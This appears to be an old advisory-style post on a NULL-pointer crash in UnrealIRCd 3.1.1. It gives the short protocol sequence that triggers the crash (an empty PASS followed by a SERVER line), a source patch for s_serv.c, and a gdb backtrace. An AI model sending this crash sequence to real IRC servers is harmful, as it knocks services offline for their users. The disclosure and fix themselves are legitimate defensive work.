Hi,
I found exploit in UnrealIRCD while I am coding my own
services server. I attach my code that can down
Unreal3.1.1-
Dark.... (Tested on FreeBSD 4.0)
To use my code you have to add C/N line.
[IRC Server 192.168.100.1 irc.lan]
% pico ircd.conf
..add C/N line for 192.168.100.100
% ./rehash
Unreal IRCD exploit!
Version Unreal3.1.1-Dark...
-----------------------------------------------------------------
-------
Result:
(Core Dump)
Description:
If your machine has C/N line on the TARGET machine,
you can down TARGET withlout link password. Just send
the
empty password to TARGET.
PROTOCTL TOKEN
PASS :
SERVER myserver.myhost.com 1 :NetName
Note: --TO TEST THIS --
1. Some (almost) Telnet client send \r\n. You have to
write
your own client to test it!
2. You must have C/N line on remote machine and
provide
correct SERVER name!
-----------------------------------------------------------------
-------
Correction:
s_serv.c:int m_server(cptr, sptr, parc, parv)
_______________________________________________
____
/*Origional*/
...
...
encr = "";
#else
encr = cptr->passwd;
#endif /* CRYPT_LINK_PASSWORD */
if (*aconf->passwd &&
!StrEq(aconf->passwd,
encr))
{
_______________________________________________
____
/* Fixed */
...
...
encr = "";
#else
/* Bug fixed by JUStice!krissada@citizen.in.th */
if (cptr->passwd) encr = cptr->passwd;
else encr = "";
#endif /* CRYPT_LINK_PASSWORD */
if (*aconf->passwd &&
!StrEq(aconf->passwd,
encr))
{
...
...
_______________________________________________
____
Note:
encr->passwd refer to NULL pointer.
Core was generated by `ircd'.
Program terminated with signal 3, Quit.
Reading symbols from /usr/lib/libcrypt.so.2...done.
Reading symbols from /usr/lib/libc.so.4...done.
Reading symbols from /usr/libexec/ld-elf.so.1...done.
#0 0x280f9030 in kill () from /usr/lib/libc.so.4
(gdb) bt
#0 0x280f9030 in kill () from /usr/lib/libc.so.4
#1 0x805f370 in s_segv () at ircd.c:302
#2 0xbfbfffac in ?? ()
#3 0x80622d1 in parse (cptr=0x814e800,
buffer=0x814e8dc "SERVER", bufend=0x814e8ff "",
mptr=0x80a4c44) at parse.c:480
#4 0x8061bc3 in dopacket (cptr=0x814e800,
buffer=0x8115360 "SERVER services.thai.com
1 :ThaiNeT\r\n", length=37)
at packet.c:121
#5 0x8065fc8 in read_packet (cptr=0x814e800,
rfd=0xbfbffab4) at s_bsd.c:1655
#6 0x806683c in read_message (delay=2,
listp=0x8123620)
at s_bsd.c:2184
#7 0x80609ca in main (argc=1, argv=0xbfbffc08) at
ircd.c:1372
(FreeBSD 4.0-RELEASE i386)
_______________________________________________
____
JUStice!krissada@citizen.in.th
Thai IRC Network (ThaiNeT)
irc://irc.thai.com
Log in to post a comment.
